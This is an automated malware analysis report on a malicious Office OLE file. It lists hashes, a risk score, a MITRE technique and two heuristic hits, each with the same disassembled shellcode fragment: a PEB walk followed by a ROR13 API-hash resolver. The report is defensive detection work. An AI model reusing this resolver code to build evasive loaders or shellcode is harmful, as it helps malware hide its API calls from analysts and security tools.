Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6bb42f2d716241a5…

MALICIOUS

Office (OLE)

376.5 KB First seen: 2015-09-24
MD5: 63b89663589a5afa69918b4aaf4e7d50 SHA-1: f807fe8be04d2f3621e12f330267a411b0312459 SHA-256: 6bb42f2d716241a5e03ca68da33e24dc98ff2991504d1ccf8df710d1450a8b54
80 Risk Score

Malware Insights

MITRE ATT&CK
T1218.011 Signed Binary Proxy Execution: Rundll32

Two high-severity heuristics fired on this sample, PEB access via the FS segment and a ROR13-style API-hash resolver, indicating evasion techniques typical of position-independent shellcode. Malware loaders commonly use these methods to hide which APIs they call and to defeat static analysis. Although no document body or script content was extracted, the presence of these techniques strongly suggests that the file's purpose is to download and execute a second-stage malicious payload.

Heuristics 2

  • PEB access via FS segment (x86) high SC_PEB_ACCESS
    PEB access via FS segment (x86)
    Disassembly
    x86 disassembly · validity: code (0.984) — 8/8 branch targets land on an instruction boundary (100% coherence)
    0003EF36  648b4030          mov eax, dword ptr fs:[eax + 0x30]
    0003EF3A  8b400c            mov eax, dword ptr [eax + 0xc]
    0003EF3D  8b701c            mov esi, dword ptr [eax + 0x1c]
    0003EF40  ad                lodsd eax, dword ptr [esi]
    0003EF41  8b6808            mov ebp, dword ptr [eax + 8]
    0003EF44  51                push ecx
    0003EF45  56                push esi
    0003EF46  57                push edi
    0003EF47  8b453c            mov eax, dword ptr [ebp + 0x3c]
    0003EF4A  368b542878        mov edx, dword ptr ss:[eax + ebp + 0x78]
    0003EF4F  03d5              add edx, ebp
    0003EF51  52                push edx
    0003EF52  8b5220            mov edx, dword ptr [edx + 0x20]
    0003EF55  03d5              add edx, ebp
    0003EF57  33c0              xor eax, eax
    0003EF59  33c9              xor ecx, ecx
    0003EF5B  41                inc ecx
    0003EF5C  8b348a            mov esi, dword ptr [edx + ecx*4]
    0003EF5F  03f5              add esi, ebp
    0003EF61  33ff              xor edi, edi
    0003EF63  c1cf0d            ror edi, 0xd
    0003EF66  ac                lodsb al, byte ptr [esi]
    0003EF67  03f8              add edi, eax
    0003EF69  85c0              test eax, eax
    0003EF6B  75f6              jne 0x3ef63
    0003EF6D  3bfb              cmp edi, ebx
    0003EF6F  75ea              jne 0x3ef5b
    0003EF71  5a                pop edx
    0003EF72  8b5a24            mov ebx, dword ptr [edx + 0x24]
    0003EF75  03dd              add ebx, ebp
    0003EF77  668b0c4b          mov cx, word ptr [ebx + ecx*2]
    0003EF7B  8b5a1c            mov ebx, dword ptr [edx + 0x1c]
    0003EF7E  03dd              add ebx, ebp
    0003EF80  8b048b            mov eax, dword ptr [ebx + ecx*4]
    0003EF83  03c5              add eax, ebp
    0003EF85  5f                pop edi
    0003EF86  5e                pop esi
    0003EF87  59                pop ecx
    0003EF88  83f901            cmp ecx, 1
    0003EF8B  7408              je 0x3ef95
    0003EF8D  8bff              mov edi, edi
    0003EF8F  55                push ebp
    0003EF90  8bec              mov ebp, esp
    0003EF92  83c005            add eax, 5
    0003EF95  ff                .byte 0xff
  • PEB API-hash resolver high SC_API_HASH_RESOLVER
    PEB access followed by ROR13-style API hashing — the import-resolution pattern commonly used by position-independent shellcode
    Disassembly
    x86 disassembly · validity: code (0.984) — 8/8 branch targets land on an instruction boundary (100% coherence)
    0003EF36  648b4030          mov eax, dword ptr fs:[eax + 0x30]
    0003EF3A  8b400c            mov eax, dword ptr [eax + 0xc]
    0003EF3D  8b701c            mov esi, dword ptr [eax + 0x1c]
    0003EF40  ad                lodsd eax, dword ptr [esi]
    0003EF41  8b6808            mov ebp, dword ptr [eax + 8]
    0003EF44  51                push ecx
    0003EF45  56                push esi
    0003EF46  57                push edi
    0003EF47  8b453c            mov eax, dword ptr [ebp + 0x3c]
    0003EF4A  368b542878        mov edx, dword ptr ss:[eax + ebp + 0x78]
    0003EF4F  03d5              add edx, ebp
    0003EF51  52                push edx
    0003EF52  8b5220            mov edx, dword ptr [edx + 0x20]
    0003EF55  03d5              add edx, ebp
    0003EF57  33c0              xor eax, eax
    0003EF59  33c9              xor ecx, ecx
    0003EF5B  41                inc ecx
    0003EF5C  8b348a            mov esi, dword ptr [edx + ecx*4]
    0003EF5F  03f5              add esi, ebp
    0003EF61  33ff              xor edi, edi
    0003EF63  c1cf0d            ror edi, 0xd
    0003EF66  ac                lodsb al, byte ptr [esi]
    0003EF67  03f8              add edi, eax
    0003EF69  85c0              test eax, eax
    0003EF6B  75f6              jne 0x3ef63
    0003EF6D  3bfb              cmp edi, ebx
    0003EF6F  75ea              jne 0x3ef5b
    0003EF71  5a                pop edx
    0003EF72  8b5a24            mov ebx, dword ptr [edx + 0x24]
    0003EF75  03dd              add ebx, ebp
    0003EF77  668b0c4b          mov cx, word ptr [ebx + ecx*2]
    0003EF7B  8b5a1c            mov ebx, dword ptr [edx + 0x1c]
    0003EF7E  03dd              add ebx, ebp
    0003EF80  8b048b            mov eax, dword ptr [ebx + ecx*4]
    0003EF83  03c5              add eax, ebp
    0003EF85  5f                pop edi
    0003EF86  5e                pop esi
    0003EF87  59                pop ecx
    0003EF88  83f901            cmp ecx, 1
    0003EF8B  7408              je 0x3ef95
    0003EF8D  8bff              mov edi, edi
    0003EF8F  55                push ebp
    0003EF90  8bec              mov ebp, esp
    0003EF92  83c005            add eax, 5
    0003EF95  ff                .byte 0xff